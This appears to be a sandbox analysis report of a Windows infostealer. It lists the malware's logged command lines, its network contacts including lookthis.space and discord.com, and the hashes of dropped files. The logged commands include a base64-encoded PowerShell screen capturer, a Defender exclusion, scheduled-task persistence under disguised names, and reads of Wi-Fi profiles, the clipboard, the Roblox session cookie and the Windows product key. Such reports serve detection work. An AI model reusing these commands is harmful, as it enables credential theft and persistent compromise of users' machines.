attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office\root\loc\System.exe'" /f
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\root\loc\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\root\loc\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Default User\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Users\Default\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Media Player\fr-FR\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\fr-FR\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Media Player\fr-FR\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files\dotnet\shared\Microsoft.NETCore.App\cmd.exe'" /f
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\dotnet\shared\Microsoft.NETCore.App\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files\dotnet\shared\Microsoft.NETCore.App\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 12 /tr "'C:\Windows\fr-FR\OfficeClickToRun.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\fr-FR\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\Windows\fr-FR\OfficeClickToRun.exe'" /rl HIGHEST /f
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\tree.com
tree /A /F
C:\Recovery\WindowsRE\wininit.exe
"C:\Recovery\WindowsRE\wininit.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g3xs2c0d\g3xs2c0d.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE5.tmp" "c:\Users\Admin\AppData\Local\Temp\g3xs2c0d\CSC1258BA46459645629AF8383C4D4B32DF.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f952880f-c74c-4b19-b008-6f790cefae50.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3deb661f-065c-4bb4-a64e-9c6422f27542.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI20042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\s1rwU.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI20042\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI20042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\s1rwU.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe""
C:\Windows\system32\PING.EXE
ping localhost -n 3
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\launch.bat" "
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\inject.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | lookthis.space | udp |
| DE | 194.58.33.244:6455 | lookthis.space | tcp |
| US | 8.8.8.8:53 | 244.33.58.194.in-addr.arpa | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| GB | 216.58.204.67:443 | gstatic.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 172.67.147.44:80 | lostyawolfer.com | tcp |
| US | 172.67.147.44:80 | lostyawolfer.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe
| MD5 | aa456e4c575655fe9bb3c77802001a79 |
| SHA1 | 56fcf170358da522c856fad9c9baea64ea90d04c |
| SHA256 | eff428d886d5836082ce5d6ea48af9a2fd411188a8be54f7f67ff3d9ba557a44 |
| SHA512 | 1f05f12ba147258c388791689b678fab42a09cef555493753f06cbc1e388ebeebab902599bf644d01bf52d0d9a85a33ad70bc39669df2ceb32f9740219fe0c38 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe
| MD5 | 931e3a4dfad1c04af1d80eb2cd987b7b |
| SHA1 | 90eba783f06a4894f24dad8a1110c4c7d8885300 |
| SHA256 | 51d852e08df68b5621226472ba8557627aede1b867d12c9592c69a088f124cf7 |
| SHA512 | ae39076ef00914ce8d6bcf032eab04c7da99fd79c97f5d0b9e305f6355adf2399be39945d4d29917c89f9fde4e1c4402528671e4f4279e71b54639338e60db2f |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe
| MD5 | 8cd64540e579ed3add4ee8f77615367d |
| SHA1 | 1581bc9c7f6fe0539fd9f4719eb0041c9433205f |
| SHA256 | eb6e35374536bf45bdbd5795cb14752751632e77dbe1e126d8c3daf66a4ae894 |
| SHA512 | 5b62686686323ea3f0615870628e715ba3b1206f3d1922c5a2740bc17492abbdd4415847be5bf47b263582ffb93898ae9be9cfc7a18729dc548cb429676e9675 |
C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\fK1YYsKuG.vbe
| MD5 | c120a1ccbc020aab46360fd35b3c87d2 |
| SHA1 | 1df6a54150310fb38c9a133db335901a64866baf |
| SHA256 | 39cd21551f2b655c467ed3746a21bfc2a876fcf96ad48b46ab61dc3e76bc37cb |
| SHA512 | 844d48458f6efb7eb4a464076b9dc9dbdcddb8da02773cf0ef8520a470ee21fd0186d18b7a313dc7aefaddd03e5cc594a3c3bebd415ce19cb5337de35ab06207 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe
| MD5 | 430bac2ee9d1186695aebd8d8214ef4a |
| SHA1 | e7d77e6267e55981ea416ae9bd0ee5935c75c358 |
| SHA256 | e1d762a616beb12494593f6a9d6854a6f7ed2bffff0b3254abe62440bde09290 |
| SHA512 | a18b20ed7313fbc5be5a095e9f0b2aa4010cb1cfa3763c3841e8731ad331805829bd4a375715ea57cd4addc2a90838f26fc4af03b0b3f39af87d821054c1a6aa |
memory/1392-58-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1392-57-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1392-56-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1392-55-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1392-54-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1392-62-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1984-69-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1984-70-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1984-84-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1984-88-0x00000231D9100000-0x00000231D9120000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI20042\python312.dll
| MD5 | 6f7c42579f6c2b45fe866747127aef09 |
| SHA1 | b9487372fe3ed61022e52cc8dbd37e6640e87723 |
| SHA256 | 07642b6a3d99ce88cff790087ac4e2ba0b2da1100cf1897f36e096427b580ee5 |
| SHA512 | aadf06fd6b4e14f600b0a614001b8c31e42d71801adec7c9c177dcbb4956e27617fa45ba477260a7e06d2ca4979ed5acc60311258427ee085e8025b61452acec |
memory/1984-100-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1984-102-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1984-103-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2360-104-0x00007FFFDEFE0000-0x00007FFFDF6A5000-memory.dmp
memory/1984-101-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1984-98-0x0000000140000000-0x0000000140848000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI20042\VCRUNTIME140.dll
